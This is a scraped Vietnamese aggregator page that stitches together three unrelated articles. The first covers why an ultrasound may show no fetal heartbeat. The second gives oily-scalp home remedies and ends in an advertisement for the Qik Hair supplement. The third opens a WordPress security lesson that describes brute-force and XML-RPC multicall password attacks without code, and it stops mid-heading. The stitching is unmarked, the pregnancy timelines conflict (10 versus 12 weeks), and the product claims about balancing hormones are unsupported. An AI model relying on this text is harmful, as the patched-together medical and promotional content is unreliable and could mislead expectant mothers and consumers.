Xem Nhiều 11/2022 #️ Không Có Tim Thai Và Những Nguyên Nhân Phổ Biến / 2023 # Top 11 Trend | Kichcauhocvan.net

Xem Nhiều 11/2022 # Không Có Tim Thai Và Những Nguyên Nhân Phổ Biến / 2023 # Top 11 Trend

Cập nhật thông tin chi tiết về Không Có Tim Thai Và Những Nguyên Nhân Phổ Biến / 2023 mới nhất trên website Kichcauhocvan.net. Hy vọng nội dung bài viết sẽ đáp ứng được nhu cầu của bạn, chúng tôi sẽ thường xuyên cập nhật mới nội dung để bạn nhận được thông tin nhanh chóng và chính xác nhất.

 , 11-06-2019

Tim thai là một dấu hiệu quan trọng để đánh giá tình trạng phát triển và sức khỏe của thai nhi. Thông thường, tim thai sẽ xuất hiện ở tuần thứ 5 hoặc thứ 6 của thai kì, tuy nhiên có nhiều trường hợp phải từ tuần 8-10, tim thai mới bắt đầu xuất hiện. Nếu qua tuần thứ 10, vẫn không thể xác định được nhịp tim của thai nhi thì đây là vấn đề vô cùng lớn. Lúc này, bác sĩ sẽ đưa ra những nguyên nhân không có tim thai và hướng xử lý cho mẹ bé.

Siêu âm không có tim thai

1. Sảy thai 

Dây rốn quấn cổ: Với những trường hợp nghiêm trọng, dây rốn có thể quấn quanh cổ khiến cho thai nhi không nhận đủ oxy và máu dẫn đến thai chết lưu

Mẹ bị chứng rối loạn đông máu: Hội chứng này sẽ dấn đến hình thành cục máu đông trong mạch máu ở nhau thai hoặc dây rốn, dẫn đến thai nhi không nhận đủ lượng máu và chất dinh dưỡng cần thiết.

Mất cân bằng Hormone, cụ thể là thiếu hụt Progesterone: Progesterone là hormone quan trọng trong quá trình mang thai giúp thai nhi bám vào thành tử cung.  Nếu cơ thể mẹ không có đủ Progesterone sẽ dẫn đến thai nhi bị bong và sảy thai

Các vấn đề về nhiễm sắc thể: Trong quá trình thụ tinh, trứng và tinh trùng có bất thường về nhiễm sắc thể. Dẫn đến thiếu hoặc thừa nhiễm sắc thể. Điều này khiến thai nhi không thể phát triển bình thường và xảy thai

Mẹ sử dụng chất kích thích: Việc mẹ bầu có lối sống không lành mạnh, thường xuyên sử dụng chất kích thích như: thuốc là, rượu, bia sẽ đẫn đến sảy thai

2. Rối loạn nhịp tim thai

Đây là trường hợp có thể xảy ra khi tim thai lúc nhanh, lúc chậm hoặc có thể ngừng đập trong thời gian ngắn. Do đó có thể trong quá trình siêu âm thai có thể không thấy tim thai. Mẹ bầu không cần phải quá lo lắng về điều này vì rất hiếm trường hợp thai nhi tử vong do rối loạn nhịp tim.

3. Tính sai tuổi thai

Dựa vào chu kì kinh nguyệt cuối cùng để tính tuổi thai có thể dẫn đến sai lệch. Ví dụ, nếu bạn không rụng trứng sau hai tuần chu kì kinh nguyệt bắt đầu thì quá trình thụ tinh sẽ diễn ra chậm hơn. Điều đó có nghĩa rằng bạn đã tính tuổi thai sớm hơn 2 tuần so với thực tế. Đối với trường hợp này, bạn nên siêu âm tuổi thai để có thể ra tuổi thai chính xác. 

4. Thiết bị siêu âm

Máy siêu âm Doppler Hitachi Arietta 8850

Một trong những nguyên nhân phổ biến dẫn đến không có tim thai là do thiết bị máy siêu âm. Siêu âm đầu dò qua ngõ  âm đạo sẽ tiếp cận tử cung tốt hơn và đưa ra kết quả chính xác hơn trong thời kì đầu mang thai. SIêu âm bụng hoặc ống nghe khó có thể thấy tim thai vào thời điểm 5-6 tuần của thai kì. 

Để có thể giảm thiểu rủi ro và tránh những lo lắng không đáng có, bạn nên tìm hiểu và lựa chọn những địa chỉ khám sản uy tín và sử dụng những loại máy siêu âm Doppler màu 4D hoặc máy siêu âm 3d,4D.

Không Có Tim Thai Và Những Nguyên Nhân Phổ Biến Mẹ Cần Biết / 2023

Tim thai là yếu tố quan trọng đầu tiên khi mới cấn bầu và cũng khiến cho mẹ bầu lo lắng nhất. Vậy nguyên nhân không có tim thai là do đâu?

Khi nào thai nhi hình thành tim thai?

Theo quy trình phát triển thai nhi, tim thai bắt đầu hình thành khá rõ, có nhịp đập vào khoảng 22 ngày sau khi thụ thai. Như vậy, hầu hết trường hợp, tim thai xuất hiện trước khi mẹ nhận ra đang mang thai. Tim thai xuất hiện và có thể quan sát bằng kỹ thuật siêu âm hiện đại từ tuần thứ 6 – 7 của thai kỳ.

Tuy nhiên, cũng có nhiều trường hợp thai nhi ở tuần thứ 8 – 10 mới nghe thấy nhịp đập và quan sát rõ tim thai. Điều này phụ thuộc chủ yếu do sai lệch trong tính toán tuổi thai.

Quá trình hình thành tim thai gắn liền với hình thành và phát triển thai nhi. Do đó đây là dấu hiệu quan trọng để thăm dò sức khỏe thai. Thông thường, sau khi được thụ tinh, hợp tử sẽ di chuyển xuống tử cung, đồng thời phân chia tế bào nhanh chóng.

Sau khi thụ thai 5 ngày, hợp tử đã phát triển thành 1 khối nhỏ, gọi là phôi bào, sau đó khoảng 2 ngày thì phôi bào đi đến tử cung. Tại đây, phôi sẽ gắn chặt vào lớp niêm mạc tử cung để làm tổ. Lúc này, phôi mới tiết ra HCG trong nước tiểu, và có thể phát hiện thai bằng que thử.

Siêu âm để xác định tim thai khi nào thì chính xác?

Siêu âm phát hiện tim thai dựa trên xác định hoạt động của tim, qua hình ảnh 2 chiều thời gian thực của tử cung mẹ. Thời điểm này rơi vào khoảng từ 5 tuần 3 ngày đến 6 tuần 3 ngày tuổi của thai nhi, tính tuổi thai theo kỳ kinh nguyệt cuối cùng.

Sau 6 tuần thai, có thể phát hiện tín hiệu Doppler màu của dòng máu đang đập ở tim thai cũng như các mạch lớn của cơ thể thai nhi. Đến tuần thai thứ 20 trở đi thì nhịp đập tim thai trở nên mạnh mẽ, có thể nghe bằng tai nghe bình thường. Nhịp đập tim thai càng lớn càng chứng tỏ, thai nhi đang rất khỏe mạnh và phát triển tốt.

Dựa trên thời điểm và quá trình phát triển, hình thành tim thai để thấy, chỉ có thể quan sát phát hiện tim thai qua siêu âm từ tuần thai thứ 6 trở đi. Một số trường hợp do tính toán sai thời kỳ kinh nguyệt, tuổi thai mà có thể muộn hơn, bắt đầu từ tuần thai thứ 8.

Thực tế, khá khó để xác định chính xác lý do phôi thai của bạn không có tim thai. Những nguyên nhân có thể là:

Do bị sảy thai

Nếu không phải do sai sót trong tính toán tuổi thai thì hầu hết trường hợp siêu âm không có tim thai là do sảy thai. Những nguyên nhân khiến bạn bị sảy thai cũng rất đa dạng.

Sảy thai tự nhiên

Hiện chưa có nghiên cứu chứng minh rõ ràng nào về tình trạng nhịp tim thai đang đập bỗng dưng ngừng lại. Kết quả là em bé không còn mặc dù sức khỏe của mẹ rất tốt.

Còn lại 50% trường hợp sảy thai sớm là do bất thường nhiễm sắc thể, hỏng trứng, do chất lượng trứng hoặc tinh trùng kém, bất thường trong phân chia tế bào.

Do sức khỏe mẹ không tốt

Mẹ có bệnh mãn tính như suy thận, suy gan, bệnh tim, bệnh lao, huyết áp cao…

Người mẹ mắc phải các hội chứng như thiểu năng giáp trạng, tiểu đường, cường năng dương thận…

Trường hợp các mẹ bị nhiễm độc thai nghén 3 tháng đầu ở mức độ càng nặng thì thai càng phát triển chậm hoặc suy thai, thai lưu càng cao.

Mẹ bị nhiễm vi rút ác tính, mẹ bị quai bị, sốt rét, giang mai.

Người mẹ có tuổi lớn hơn 40, tử cung dị dạng, tử cung kém phát triển.

Do tác động bên ngoài

Tác động không mong muốn từ môi trường bên ngoài, cũng có thể là nguyên nhân gây tim thai ngừng đập, sảy thai, gồm:

Bị chấn thương.

Mẹ ốm bệnh, mắc các bệnh nhiễm trùng từ herpes, rubella, cytomegalovirus, toxoplasmosis…

Mẹ hút thuốc lá hoặc ngửi phải khói thuốc lá, sử dụng ma túy, chất kích thích, uống rượu.

Stress kéo dài.

Tiếp xúc với môi trường độc hại.

Cần làm gì khi siêu âm không thấy tim thai?

Kết luận siêu âm không thấy tim thai quả là tin đau lòng, nhất là đối với ai đang mong con. Nếu đang ở tuần thai thứ 6, 7 thì mẹ không nên quá lo lắng mà ảnh hưởng đến sức khỏe. Có thể do còn quá nhỏ nên tim thai chưa xuất hiện, mẹ hãy yên tâm và khám lại vào khoảng 2 tuần sau.

Tuy nhiên, sau 12 tuần mà vẫn không thấy tim thai thì khả năng cao là thai đã bị chết lưu. Trong trường hợp này mẹ nên thực hiện thêm xét nghiệm hCG để biết thai có chết lưu hay không. Nếu chẳng mai thai chết lưu mẹ cần có phương pháp điều trị gấp lấy thai ra ngoài để không ảnh hưởng xấu đe dọa đến tính mạng người mẹ.

7 Cách Trị Da Đầu Nhờn (Đổ Dầu) Tại Nhà Và 6 Nguyên Nhân Phổ Biến / 2023

Cách trị da đầu nhờn hiệu quả là phải giải quyết được tận gốc nguyên nhân làm gia tăng quá mức lượng dầu trên da đầu. Nếu bạn cảm thấy da đầu mình luôn bóng nhờn khiến tóc bết dính, hãy dành thời gian đọc bài viết này để biết chính xác lý do và giải pháp khắc phục tình trạng da đầu nhờn và ngứa phù hợp nhất.

Da đầu nhờn là gì?

Da đầu nhờn là hiện tượng các tuyến bã nhờn trên da đầu hoạt động quá mức dẫn đến tình trạng dư thừa dầu. Dầu quá nhiều khiến da đầu dễ bám bụi bẩn, sinh ra gàu và làm cho mái tóc bết dính vào nhau. Chân tóc có thể bị tắc nghẽn do bã nhờn tích tụ lâu ngày, dần dần gây viêm da đầu và rụng tóc bất thường. Mái tóc khỏe tạo ra một lượng dầu nhất định để cung cấp độ ẩm cho da đầu và bảo vệ tóc của chúng ta. Lượng dầu tiết ra khác nhau tùy thuộc vào loại tóc, thói quen vệ sinh và  lối sống của mỗi người.

Nếu cảm thấy tóc mình bết dầu hơn mức bình thường và mong muốn có giải pháp cải thiện hiệu quả, bài viết này dành cho bạn. Không chỉ biết được nguyên nhân khiến lượng dầu tăng tiết bất thường, bạn còn có thêm kiến thức về kỹ thuật chăm sóc tóc đúng cách và da đầu hữu ích, giúp kiểm soát dầu nhờn, ngăn chặn rụng tóc và tăng mọc tóc từ gốc. (1)

Nguyên nhân khiến da đầu tiết nhiều dầu nhờn, ngứa và hôi

Dầu (bã nhờn) giúp bảo vệ và hỗ trợ tóc khỏe mạnh hơn, nhưng da đầu tiết bã nhờn nhiều vượt mức cần thiết vừa làm mất dáng tóc vừa tiềm ẩn nhiều vấn đề nguy hiểm. Để tìm được cách khắc phục da đầu nhờn hiệu quả, bạn cần phải xác định được chính xác nguồn gốc gây ra hiện tượng này là gì?

1. Gội đầu quá nhiều

Bạn có thể không bao giờ nghĩ đến chuyện gội đầu nhiều lần (tuần gội trên 4 lần) cũng làm cho da đầu “thừa thãi” dầu nhờn. Điều này được giải thích là mỗi lần bạn gội đầu, dây thần kinh sẽ truyền đến da đầu tín hiệu cần phải sản xuất thêm bã nhờn. Nếu bạn gội đầu thường xuyên, đương nhiên da đầu sẽ tăng tiết chất nhờn nhiều hơn bình thường.

Tóc bóng dầu khiến bạn cảm thấy bứt rứt khó chịu và thiếu tự tin

2. Gội đầu bằng nước nóng

Nước nóng có thể giúp loại bỏ bụi bẩn và thông thoáng chân tóc rất tốt, nhưng lại cũng chính là tác nhân khiến da đầu sản sinh dầu nhờn quá mức và nhiều gàu. Bạn chỉ nên dùng nước ấm khi gội đầu và dưỡng tóc, đồng thời xả tóc lại bằng nước lạnh để khóa lớp biểu bì giữ độ ẩm tự nhiên cho tóc.

3. Sản phẩm chăm sóc tóc không phù hợp

Dùng dầu gội đầu và các sản phẩm chăm sóc tóc bao gồm dầu xả, nước xịt dưỡng tóc… không phù hợp sẽ kích thích tuyến bã nhờn hoạt động mạnh mẽ hơn. Nhất là người thuộc tuýp da dầu, nếu dùng sản phẩm thiên về cấp ẩm sẽ càng làm “tràn kho dầu” trên da dầu khiến tóc lúc nào cũng bóng nhẫy.

4. Viêm da tiết bã

Viêm da tiết bã hay còn gọi là viêm da dầu (chàm da mỡ), là một dạng kích ứng và viêm da với sự xuất hiện của những mảng da có vảy màu hồng phát triển ở vùng da có nhiều tuyến dầu, trong đó có da đầu. Khi bị viêm da tiết bã nhờn, da đầu luôn trong trạng thái bứt rứt, khó chịu và phần chân tóc như “tắm trong dầu”. Đây là nguyên nhân phổ biến nhất của da dầu.

Bệnh viêm da tiết bã là 1 trong những nguyên nhân khiến lượng dầu trên da đầu tăng tiết nhiều hơn

5. Di truyền

Cường độ làm việc của tuyến bã nhờn và độ dày của tóc phụ thuộc một phần vào gen. Vậy nên, nếu người thân “nổi tiếng” da đầu nhiều dầu thì bạn có nguy cơ tóc bóng dầu rất cao.

6. Mất cân bằng nội tiết tố

Lượng dầu sản xuất bởi các tuyến bã nhờn hoàn toàn phụ thuộc vào hormone. Do đó, khi thần kinh nội tiết thay đổi trong các thời kỳ đặc biệt như dậy thì, mang thai và sinh nở, tiền mãn kinh – mãn kinh, mãn dục nam… sẽ khiến tuyến bã nhờn gia tăng tiết dầu.

Ngoài những nguyên nhân gây da đầu đổ dầu nhờn nhiều chính kể trên, tuyến bã nhờn hoạt động quá mức còn bởi gặp được các điều kiện thuận lợi sau:

Gội đầu không sạch dễ khiến bụi bẩn hoặc dầu gội vẫn còn tồn đọng trên da đầu.

Chế độ ăn uống tập trung chủ yếu vào nhóm thực phẩm giàu chất béo.

Chải tóc và vuốt tóc thường xuyên. 

Thói quen đội mũ nhiều giờ liên tục làm bức bí da đầu.

Sử dụng các loại thuốc chứa steroid.

Khi chất nhờn tiết ra quá nhiều, tóc của bạn sẽ bết dính rất khó chịu”, gàu cũng nhanh hình thành và nguy hiểm nhất là dễ gãy rụng tóc. Do đó, điều cần kíp là tìm ra cách trị da đầu nhờn đúng cách để bảo vệ sức khỏe và vẻ đẹp của mái tóc.

Cách trị da đầu nhờn nhiều tại nhà mang lại hiệu quả tích cực

Da đầu bóng nhờn, tóc bết dính vào nhau là hình ảnh thiếu thẩm mỹ mà bạn muốn xóa đi trong tâm trí người đối diện? Vậy thì hãy thử ngay một trong những phương pháp chữa trị da đầu đổ dầu nhờn tại nhà sau đây:

1. Tinh dầu

Một số loại tinh dầu thiên nhiên có tác dụng phân hủy bã nhờn và làm thông thoáng lỗ chân lông trên da đầu, điển hình là tinh dầu bạc hà và tinh dầu cây trà (dầu tràm trà). Sau khi gội sạch đầu, bạn nhỏ một hoặc hai giọt tinh dầu lên tóc và da đầu rồi xoa bóp nhẹ nhàng.

Ủ tinh dầu bằng mũ trùm đầu khoảng 20 – 25 phút thì xả sạch lại bằng nước ấm. Bạn nên ủ tinh dầu 2-3 lần tuần để đạt được kết quả tốt nhất.

2. Giấm táo

Dầu xả tóc mang tên giấm táo có khả năng cân bằng lượng dầu và độ pH của da đầu. Bạn chỉ cần pha ba phần nước với một phần dấm táo, rồi thoa đều dung dịch này lên da đầu. Ngâm tóc trong giấm táo vài phút (5 phút) thì gội sạch lại đầu bằng dầu gội và dầu xả thường dùng. (3)

3. Nha đam

Sử dụng nha đam là cách giảm nhờn da đầu và thúc đẩy tuần hoàn máu ở da đầu, giúp tóc chắc khỏe hơn. Bạn có thể dùng một vài giọt gel nha đam nguyên chất để loại bỏ bã nhờn sau khi gội đầu sạch sẽ. Giữ gel nha đam trên tóc khoảng 20 phút, rồi xả lại bằng nước lạnh. (2) Nếu đã từng đọc qua bài viết cách ủ mọc tóc bằng gel nha đam, chắc chắn bạn cũng sẽ hiểu vì sao nó được ưa chuộng tới như vậy.

4. Nước cốt chanh

Chứa axit citric, nước cốt chanh giúp cân bằng độ pH và giảm chất nhờn trên da đầu. Thoa nước cốt chanh lên da đầu khoảng nửa giờ trước khi gội đầu. Làm điều này trước khi bạn gội đầu sẽ giúp kiểm soát lượng dầu trên da đầu rất tốt.

Dùng nước cốt chanh thoa lên da đầu trước khi gội giúp giảm đáng kể chất nhờn 

5. Nước trà xanh

Nước trà xanh chứa axit tanin – một dạng polyphenol có đặc tính kháng khuẩn và chống oxy hóa, đồng thời có tác dụng kiểm soát dầu nhờn hiệu quả cho da. Bạn sử dụng nước trà xanh như nước xả cuối sau khi đã gội đầu. Cách này sẽ không chỉ làm giảm độ dầu trên vùng da đầu, mà còn khiến cho mái tóc mềm mại và suôn bóng. (5, 6, 7)

6. Cà chua

Cũng như nước cốt chanh, cà chua chứa axit citric nên có thể giúp loại bỏ dầu nhờn. Cách trị nhờn da dầu bằng cà chua rất đơn giản. Bạn xay nhuyễn 1 – 2 quả cà chua, rồi đắp lên da đầu. Giữ mặt nạ này trong nửa giờ, sau đó gội đầu sạch như bình thường, da đầu của bạn sẽ bớt nhờn dính đáng kể.

7. Thay đổi lối sống – giải pháp khắc phục tình trạng bã nhờn da đầu nhiều

Giữ tinh thần được thoải mái, tránh căng thẳng sẽ góp phần giúp cơ thể điều tiết lượng dầu ổn định và cân đối. Cùng với đó, bạn cần thay đổi một số thói quen có hại cho mái tóc và xây dựng lối sống khoa học, cụ thể:

Hạn chế vuốt tóc vì bàn tay thường chứa nhiều mồ hôi, vi khuẩn làm cho tóc mau dơ và sinh nhiều dầu.

Người da đầu nhờn nên gội đầu cách nhật và nếu làm công việc ngoài trời, bụi bặm, và đổ nhiều mồ hôi, thì có thể gội đầu mỗi ngày. 

Lựa chọn dầu gội chứa các chất kiềm dầu như ammonium, natrisunfat… để hạn chế phát sinh dầu trên tóc.

Tránh các loại thức ăn nhanh, nhiều dầu mỡ và tăng cường các loại rau, củ, quả tươi.

Tích cực chống nắng, bảo vệ tóc khỏi ánh nắng mặt trời bằng cách đội mũ, thoa gel dưỡng tóc khi ra ngoài.

Trường hợp bị bệnh ở tuyến thượng thận, tuyến yên hoặc buồng trứng thì cần phải điều trị các bệnh này theo phác đồ của bác sĩ. Sau khi chữa khỏi các bệnh “đích”, tình trạng dầu nhờn sẽ được cải thiện.

Lưu ý: Nếu nhận thấy chăm sóc da đầu nhờn bằng một hay nhiều phương pháp tại nhà nhưng không thành công, thậm chí tình trạng còn trở nên nghiêm trọng hơn, kèm theo các biểu hiện xấu khác như ngứa, rụng tóc, viêm da… bạn nên đến bệnh viện da liễu thăm khám. Từ việc xác định cụ thể nguyên nhân da dầu đổ nhờn bất thường, bác sĩ sẽ tư vấn cho bạn cách khắc phục thích hợp nhất.

Một số câu hỏi thường gặp về cách trị da đầu nhờn bết dính

Bên cạnh việc tìm kiếm các cách giảm bã nhờn trên da đầu hiệu quả, người có da đầu nhiều dầu thường băn khoăn về những vấn đề sau:

1. Tại sao da đầu nhờn nhưng tóc lại bị khô?

Chất nhờn đóng vai trò giữ ẩm cho tóc. Vậy tại sao da đầu dư dầu, tóc vẫn bị khô? Tóc khô do nhiều yếu tố khác nhau, có thể kể đến là:

Di truyền

Dùng sản phẩm chăm sóc tóc không phù hợp

Thường xuyên sấy tóc hoặc tẩy tóc, nhuộm tóc làm mất đi lớp dầu tự nhiên của tóc

Tóc tiếp xúc nhiều với ánh nắng mặt trời, gió…

Da đầu nhiều dầu nhưng tóc vẫn bị khô có thể do tóc tiếp xúc nhiều với ánh nắng mặt trời

Như vậy, dù không bị thiếu chất nhờn, tóc bạn vẫn bị khô là điều bình thường. Bạn nên điều chỉnh thói quen dưỡng tóc và bảo vệ tóc để cải thiện tình hình. 

2. Tại sao da đầu nhiều dầu dễ bị ngứa?

Da đầu tiết quá nhiều chất nhờn, cộng thêm bụi bẩn là môi trường lý tưởng để các loại nấm và vi khuẩn sinh sôi gây viêm da dầu, dẫn đến ngứa. Hơn nữa, nhiều dầu khiến da đầu đổ gàu. Và khi da đầu bị phủ một lớp gàu trắng muốt thì ngứa ngáy, khó chịu vô cùng.

3. Tại sao da đầu nhờn gây rụng tóc?

Tóc bị rụng nhiều hơn bình thường khi da đầu tăng tiết chất nhờn là bởi khi tóc bết dính, bụi bẩn bám chặt ở chân tóc, gây viêm làm tổn thương nang tóc. Nang tóc bị hư hại sẽ ảnh hưởng đến sự phát triển của tế bào mầm tóc – mạch nguồn sự sống của 1 sợi tóc.

Bên cạnh đó, da đầu bết dầu đi kèm với chứng rụng tóc thì cần xem xét đến các trường hợp rối loạn nội tiết hoặc miễn dịch. Cách giải quyết tối ưu và an toàn nhất cho những đối tượng da đầu nhờn kèm theo biểu hiện rụng tóc nhiều này là sử dụng các tinh chất thiên nhiên để cân bằng nội tiết tố bên trong cơ thể và thúc đẩy tế bào mầm tóc phát triển trở lại (có thể kết hợp với điều trị da liễu nếu cần thiết). Qua đó, giúp da đầu kiểm soát dầu, giảm rụng và mọc tóc mới nhanh khỏe.

Qik Hair – Giải pháp giảm rụng tóc do da đầu nhờn hiệu quả

Da đầu tiết nhiều dầu sẽ khiến tóc dễ rụng hơn, nhưng nếu số lượng tóc bị rụng quá nhiều (trên 100 sợi 1 ngày) thì vấn đề không chỉ bởi dầu nhờn nữa mà có thể là do tế bào mầm tóc của bạn đang chịu tác động bởi nhiều yếu tố, lớn nhất là rối loạn hormone. Lúc này bạn cần có giải pháp chuyên biệt cho nam giới và nữ giới để cân bằng lại thần kinh nội tiết (bởi lẽ nội tiết nam và nữ là hoàn toàn khác nhau), thúc đẩy tế bào mầm tóc phát triển, giúp ngăn ngừa tóc gãy rụng ngay từ bên trong.

Từ việc phát hiện nguyên nhân cốt lõi của tình trạng rụng tóc là do tế bào mầm tóc suy yếu nên việc tác động trúng đích vào tế bào mầm tóc được xem là xu hướng mới trong điều trị rụng tóc, hói đầu hiện nay

Theo Tiến sĩ Lê Thúy Tươi

Những nghiên cứu mới nhất chỉ ra, công thức đột phá CLI-α (Alpha) (có trong Qik Hair cho nam) và CLI-β (Beta) (có trong Qik Hair cho nữ) với sự hòa quyện hoàn hảo của Cynatine® cùng các tinh chất quý từ thiên nhiên có khả năng cân bằng hệ thần kinh nội tiết mỗi giới hữu hiệu. Từ đó giúp tăng trưởng tế bào mầm tóc, cân bằng độ ẩm cho da đầu và ổn định hoạt động của tuyến bã nhờn trên da đầu. Khi đã kiểm soát được lượng dầu trên da đầu, tế bào mầm tóc phát triển đúng chu kỳ, tóc của bạn sẽ giảm rụng, tăng mọc trở lại và chắc khỏe dài lâu.

Qik Hair – giải pháp giảm rụng, tóc mọc chắc khỏe an toàn và hiệu quả

Những Cách Thức Hack Website Phổ Biến / 2023

Khi Website bị hack, chúng ta thường nghĩ mình dùng code bị nhiễm mã độc (malware)!

Lỗ hổng bảo mật trên code sẽ giúp Hacker thực hiện các phương pháp tấn công để chèn malware và website!

Trong Topic đầu tiên của chuyên đề Bảo mật Website – Khóa học Pro WP Master, chúng ta sẽ tìm hiểu các hình thức hack website phổ biến nhất hiện nay.

Chúng ta cũng sẽ làm chủ plugin bảo mật iThemes Security Free và Pro (trong VIP CLUB) để bổ sung các phương pháp bảo mật hiệu quả nhất cho WordPress.

Cuối chuyên đề sẽ là các phương pháp backup tự động và restore khi gặp sự cố – cũng như hướng dẫn quét malware và phục hồi Website WordPress bị nhiễm mã độc!

Hack là hành động thâm nhập trái phép vào phần cứng hoặc phần mềm.

Hack Website là xâm nhập trái phép vào Website, truy cập vào các khu vực mà người dùng bình thường không được phép như hosting, trang quản trị, soạn thảo…

Hack website cũng bao gồm hành động can thiệp vào mã nguồn, database và chỉnh sửa nội dung và thay đổi các tính năng của Website trái phép.

Mục đích Hack Website là gì?

Vào những năm đầu của kỷ nguyên Web, thì các tay hacker tấn công khai thác các lỗ hổng bảo mật trên Website mục đích chỉ để thể hiện số má – hoặc phá hoại, có thể để cảnh báo các lỗ hổng bảo mật mà quản trị web không biết.

Bạn có thể thấy các vụ tấn công vào Website các chính phủ, tập đoàn hoặc tiêu biểu ở VN là tấn công vào Website của bộ Giáo dục & Đào tạo.

Các lỗ hổng bảo mật trên Website – dù dùng mã nguồn gì thì cũng luôn luôn tồn tại, vấn đề là nó có được phát hiện hay không thôi.

Đôi khi, các lỗ hổng bảo mật bắt nguồn từ các lỗi cực kỳ sơ đẳng, ví dụ như lưu thông tin đăng nhập trên máy tính, điện thoại rồi mang ra tiệm sửa, … hoặc lỗ hổng do code cẩu thả gây ra…

Nhưng website đó không quan trọng?

Khi mới bắt đầu tạo Website, chúng ta thường nghĩ Web đó chỉ là web mẫu, có bị hack cũng không sao. Nhưng khi một website bị thâm nhập, hacker sẽ cài mã độc lên hosting và âm thầm lây nhiễm lên toàn bộ các Website khác sau này, ….

Khi một Website bị chiếm quyền, thì hacker có thể dùng các phương pháp tấn công Local Attack rất phổ biến để thực thi các lệnh tấn công toàn bộ các Website khác trên cùng gói Hosting.

Vô số tác hại xảy ra khi một website bảo mật kém nằm trên cùng hosting/vps với các Websites quan trọng khác, không chỉ lây nhiễm mã độc mà còn khiến nguy cơ các Website khác bị Google cấm cửa chỉ vì một site demo vô thưởng vô phạt bạn tạo ra trước đó.

Các phương thức hack Website phổ biến nhất 2019

Dù cách thức thực hiện hack Website vô cùng đa dạng, nhưng chung qui, có các hình thức phổ biến chiếm hầu hết các vụ tấn công bảo mật!

Có 2 kiểu tấn công là:

Access Control: tìm cách truy cập trái phép vào tài khoản quản trị hosting/vps hay website bằng cách dò thông tin đăng nhập. Tiêu biểu là cách tấn công website nổi tiếng Brute Force Attack.

Software Vulnerabilities – Code Injection: khai thác lỗ hổng bảo mật trên phần mềm, code để tấn công vào website, cài các phần mềm độc hại (malware) để thực hiện các tác vụ xấu. Tiêu biểu loại này là SQL Injection (SQLi), tấn công XSS, LFI (Local File Inclusion) và RFI (Remote File Inclusion).

Dù là kiểu tấn công nào, thì cuối cùng, kết quả thường là Website của bạn sẽ bị chèn mã độc, để hacker có thể để lại một backdoor cho phép họ thâm nhập sau này, hoặc mã độc âm thầm thực hiện các tác vụ gây hại trên website.

Chúng ta sẽ tìm hiểu về Mã độc trên Website – Malware trong topic tiếp theo.

1. Tấn công Dò mật khẩu – Brute Force Attack

Đây là kiểu tấn công tưởng là cơ bản – nhưng hiệu quả cao nhất.

Brute Force Attack là kiểu tấn công bằng phương pháp dò mật khẩu, với các thuật toán tự động thử các chuỗi mật khẩu khác nhau, bao gồm số, chữ cái – chữ cái & số….

Về lý thuyết, nếu có đủ thời gian, thì Brute Force cuối cùng sẽ tìm được mật khẩu chính xác.

Không phải như nhiều người nghĩ Brute Force Attack là ‘đoán’ mật khẩu, mà thực tế có các chương trình với thuật toán dò mật khẩu ‘máu lạnh’ – với xác xuất bắt được các mật khẩu yếu rất cao.

Nếu bạn dùng tài khoản kiểu admin/ password, admin/ 123456, admin/ 123abc… thì xem như cúng Website cho Hacker rồi.

Để check xem thời gian trung bình dò một mật khẩu, bạn có thể kiểm tra ở đây:

Password check – Kespersky Lab

Với một phần mềm mà hacker nào cũng có thể viết hoặc tìm được trên mạng, được hacker cung cấp một dải IP hay danh sách domain lấy từ các nguồn có sẵn, thì danh sách Website bị thâm nhập nhiều như lá mùa thu, tất cả bắt nguồn từ thói quen tạo tài khoản rất ngây thơ mà vẫn còn một số lượng lớn người dùng mắc phải.

Brute Force Attack qua XML-RPC trên WordPress

Thông thường phương thức tấn công dò mật khẩu Brute Force Attack được thực hiện bằng cách gởi thông tin username/ password trực tiếp tới trang đăng nhập WordPress, mặc định là ten-mien/wp-admin hoặc ten-mien/wp-login.php.

Để phòng chống, chúng ta thường đổi đường dẫn đăng nhập (dùng plugin iThemes Security chẳng hạn), hoặc thêm tính năng mật khẩu 2 lớp (Two Factor Authentication), hoặc thêm Captcha checkbox….

Nhưng, còn một kiểu Brute Force Attack khác, đó là qua XML-RPC!

XML-RPC là gì?

XML-RPC là một giao thức gọi thủ tục từ xa, cho phép thực hiện các request HTTP theo một tập lệnh XML được mã hóa.

Điểm đặt biệt là của XML-RPC là phương thức system.multicall, cho phép gởi nhiều tổ hợp tham số trong mỗi request.

XML-RPC không chỉ dùng trong WordPress mà còn hỗ trợ trên nhiều CMS và ngôn ngữ lập trình Web phổ biến khác. XML-RPC hiện nay không còn quá cần thiết, chỉ có một số ít plugin còn cần tính năng này (như Jetpack). Nhưng nó hiện vẫn được kích hoạt tự động trong WordPress Core.

Trong WordPress, XML-RPC là tính năng cho phép kết nối với WordPress từ các ứng dụng bên ngoài để đăng bài (như WordPress Apps trên Apple App Store..)

Đây là tính năng có từ thời việc kết nối Internet còn chậm, người dùng soạn thảo sẵn bài viết trên máy tính và dùng XML-RPC để kết nối với Website và đăng bài thay vì mở trình duyệt web và soạn thảo trực tiếp như hiện nay.

Từ năm 2015, hacker đã lợi dụng phương thức system.multicall của XML-RPC để thực hiện các truy vấp dò mật khẩu quản trị.

Như vậy, chỉ mỗi một HTTP request tới XML-RPC, hacker sẽ thử được đến vài trăm cặp user/pass, nên phương thức tấn công này có cường độ gấp trăm lần so với cách tấn công Brute Force Attack qua trang login (ten-mien/wp-admin, ten-mien/wp-login.php,…).

Cách tấn công này cũng không thể chặn bằng phương pháp đổi đường dẫn đăng nhập hoặc Two Authentication, Captcha Checkbox… Vì tính năng XML-RPC khi bật có thể gởi request trực tiếp mà không cần qua bất cứ lớp bảo mật thông thường nào.

Vì cường độ tấn công lớn, lỗ hổng XML-RPC còn được dùng cho mục đích tấn công từ chối dịch vụ (DDos).

Để chống tình trạng này, chúng ta sẽ cần tắt XML-RPC thủ công từ hosting, hoặc tắt một phần – chặn system.multicall bằng các plugin.

Việc này sẽ được hướng dẫn chi tiết trong topic các phương pháp bảo mật trong cùng chuyên đề này.

2. Tấn công vào các lỗ hổng bảo mật trên Hosting

Hosting không chỉ có tài nguyên phần cứng, mà các công nghệ đảm bảo an toàn cho Website càng quan trọng hơn nhiều.

Nếu một máy chủ, vps hoặc gói hosting bị hacker thâm nhập, thì mọi cách thức bảo mật trên Website trở nên vô nghĩa.

Tai hại ở chỗ, nếu Website bị nhiễm malware trên hosting cũ, bạn move qua hosting mới mà chưa gỡ sạch mã độc trong code và database thì mọi thứ vẫn không khác gì.

3. Hack lỗ hổng bảo mật trên Code

